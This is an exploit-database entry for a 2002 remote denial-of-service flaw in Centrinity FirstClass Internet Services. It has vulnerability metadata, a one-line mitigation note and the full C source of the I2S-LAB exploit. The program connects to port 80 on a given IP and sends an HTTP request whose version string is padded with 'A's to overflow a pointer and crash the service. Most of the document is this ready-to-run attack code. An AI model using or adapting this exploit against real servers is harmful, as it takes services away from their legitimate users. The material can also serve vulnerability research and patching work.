FirstClass Internet Services Remote DoS

vendor:

FirstClass

by:

Fred CHAVEROT & Aurélien BOUDOUX

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: FirstClass

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2002

FirstClass Internet Services Remote DoS

A problem has been reported in the handling of overly long HTTP version string data by Centrinity FirstClass. Because of this, it may be possible for an attacker deny service to legitimate users of a vulnerable system. This may be due to an exploitable boundary condition error, though this is not confirmed. This exploit uses a ptr overflow to remotely shutdown the Internet Services of FirstClass.

Mitigation:

Ensure that the length of the HTTP version string is properly validated and restricted.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/8793/info

A problem has been reported in the handling of overly long HTTP version string data by Centrinity FirstClass. Because of this, it may be possible for an attacker deny service to legitimate users of a vulnerable system. This may be due to an exploitable boundary condition error, though this is not confirmed.

/*******************************************
 * FirstClass Internet Services Remote DoS *
 *******************************************

discovered & coded by I2S-LAB

 --------------------------------------------

This exploit uses a ptr overflow to remotely
shutdown the Internet Services of FirstClass.


  CONTACT
  _______

  Fred CHAVEROT : fred[at]I2S-LAB.com
  Aur=E9lien BOUDOUX : aurelien[at]I2S-LAB.com


  URL : http://www.I2S-LaB.com

 *******************************************/


#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")

#define PerfectOverwrite 246

void main (int argc, char *argv[])
{

int len;
SOCKET sock1;
SOCKADDR_IN sin;
char *sav;

WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);

printf ("- FirsClass Internet Services Remote DoS -\n\n"
"Discovered & coded by I2S-LAB\n"
"http://www.I2S-LaB.com\n\n");


if (!argv[1])
{
printf ("Usage : %s <IP Address>\n", argv[0]);
ExitProcess (0);
}

if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);

if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
{
printf ("Error ! cannot allocate enough memory.\n");
ExitProcess (0);
};

lstrcat (sav, "GET / HTTP/1.1");
memset (&sav[14], 'A', PerfectOverwrite - 4);
lstrcat (sav,"DDDD\r\n\r\n");

sin.sin_family = AF_INET;
sin.sin_port = htons (80);

if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Incorrect IP Address : %s\n", argv[1]);
ExitProcess(0);
}

sock1 = socket (AF_INET, SOCK_STREAM, 0);

printf ("\nconnecting to %s...", argv[1]);

if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
printf ("connection failed!\n");

else
{
printf ("ok!\nSending crafted request...");

send (sock1,sav, PerfectOverwrite + 18,0);
puts ("ok!");
}

closesocket (sock1);
}